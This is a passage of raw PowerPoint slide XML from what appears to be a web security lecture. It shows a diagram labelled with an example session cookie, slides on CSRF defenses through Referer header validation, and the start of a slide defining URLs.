              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92C3A6E7-0894-A147-A716-AA698AB7E6E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4651756" y="4690174"/>
            <a:ext cx="2301875" cy="254045"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2301875" h="479425">
                <a:moveTo>
                  <a:pt x="0" y="239712"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21578" y="193277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58675" y="163944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112527" y="136206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181919" y="110315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222064" y="98141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265639" y="86523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312492" y="75494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="362473" y="65084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415429" y="55326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471208" y="46250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529660" y="37889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590632" y="30274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="653972" y="23436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719529" y="17408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="787152" y="12220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="856688" y="7905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="927987" y="4494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1000896" y="2018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075263" y="509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1150938" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1226612" y="509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1300979" y="2018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1373888" y="4494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1445186" y="7905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1514723" y="12220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1582345" y="17408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1647903" y="23436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1711243" y="30274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1772215" y="37889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1830666" y="46250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1886445" y="55326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1939401" y="65084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989382" y="75494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2036235" y="86523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2079810" y="98141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2119955" y="110315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2156518" y="123014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2218292" y="149860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2263918" y="178427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2292183" y="208462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2301875" y="239712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2299426" y="255473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2263918" y="300997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2218292" y="329564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2156518" y="356410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2119955" y="369109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2079810" y="381283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2036235" y="392901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989382" y="403930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1939401" y="414340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1886445" y="424098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1830666" y="433174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1772215" y="441535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1711243" y="449150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1647903" y="455988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1582345" y="462016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1514723" y="467204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1445186" y="471519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1373888" y="474930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1300979" y="477406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1226612" y="478915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1150938" y="479425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075263" y="478915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1000896" y="477406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="927987" y="474930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="856688" y="471519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="787152" y="467204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719529" y="462016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="653972" y="455988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590632" y="449150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529660" y="441535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471208" y="433174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415429" y="424098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="362473" y="414340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312492" y="403930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265639" y="392901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222064" y="381283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181919" y="369109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145356" y="356410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83582" y="329564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37956" y="300997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9691" y="270962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="239712"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AC14747-F239-9649-AFEF-8823C2A77497}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4744784" y="4690174"/>
            <a:ext cx="1962785" cy="177800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="12700" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1000" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202346"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Cookie:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202346"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1000" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202346"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SessionID=523FA4cd2E</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Straight Arrow Connector 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{065D9E27-4B4F-834B-A1E9-7C3DFAE51C31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5177788" y="4944219"/>
            <a:ext cx="537212" cy="1583581"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FFC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8071928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682181-302A-AC47-BACC-2A4F1C12CECF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>CSRF Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACAF58E5-3D52-0648-A223-06A6565A5822}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" b="1" dirty="0"/>
              <a:t>Referer Validation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>                                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="5" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="251F07"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="5" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="251F07"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>eferer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="251F07"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="251F07"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>header </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="251F07"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="251F07"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>indicates which URL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="251F07"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>initiated the  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" spc="10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="251F07"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="123994944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682181-302A-AC47-BACC-2A4F1C12CECF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>CSRF Defenses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACAF58E5-3D52-0648-A223-06A6565A5822}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" b="1" dirty="0"/>
              <a:t>Referer Validation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>                               </a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE632992-D71F-5B4D-83A2-DE47F4D70285}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="481476" y="2209800"/>
            <a:ext cx="8195615" cy="4614019"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId2" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BB991F9-D654-F44B-92F4-9A82EF06DC24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4651756" y="4724400"/>
            <a:ext cx="2301875" cy="330245"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2301875" h="479425">
                <a:moveTo>
                  <a:pt x="0" y="239712"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21578" y="193277"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="58675" y="163944"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112527" y="136206"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181919" y="110315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222064" y="98141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265639" y="86523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312492" y="75494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="362473" y="65084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415429" y="55326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471208" y="46250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529660" y="37889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590632" y="30274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="653972" y="23436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719529" y="17408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="787152" y="12220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="856688" y="7905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="927987" y="4494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1000896" y="2018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075263" y="509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1150938" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1226612" y="509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1300979" y="2018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1373888" y="4494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1445186" y="7905"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1514723" y="12220"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1582345" y="17408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1647903" y="23436"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1711243" y="30274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1772215" y="37889"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1830666" y="46250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1886445" y="55326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1939401" y="65084"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989382" y="75494"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2036235" y="86523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2079810" y="98141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2119955" y="110315"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2156518" y="123014"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2218292" y="149860"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2263918" y="178427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2292183" y="208462"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2301875" y="239712"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2299426" y="255473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2263918" y="300997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2218292" y="329564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2156518" y="356410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2119955" y="369109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2079810" y="381283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2036235" y="392901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1989382" y="403930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1939401" y="414340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1886445" y="424098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1830666" y="433174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1772215" y="441535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1711243" y="449150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1647903" y="455988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1582345" y="462016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1514723" y="467204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1445186" y="471519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1373888" y="474930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1300979" y="477406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1226612" y="478915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1150938" y="479425"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075263" y="478915"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1000896" y="477406"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="927987" y="474930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="856688" y="471519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="787152" y="467204"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719529" y="462016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="653972" y="455988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590632" y="449150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="529660" y="441535"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="471208" y="433174"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415429" y="424098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="362473" y="414340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312492" y="403930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265639" y="392901"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="222064" y="381283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="181919" y="369109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145356" y="356410"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="83582" y="329564"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37956" y="300997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9691" y="270962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="239712"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4006576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object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B17C903-9FFC-C94F-8E42-7FA4C766027F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3612489" y="4229566"/>
            <a:ext cx="941705" cy="287655"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="941704" h="287654">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="941387" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="941387" y="287337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="287337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="25399">
            <a:solidFill>
              <a:srgbClr val="2D2D8A"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADACC276-41B3-D94A-A221-1D642D558EEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>URL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A78882E-4961-3D43-842A-B245A7D7BC85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL: Uniform Resource Locator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Global identifiers of network-retrievable resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
            <a:endParaRPr lang="en-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="object 3">
            <a:extLst>
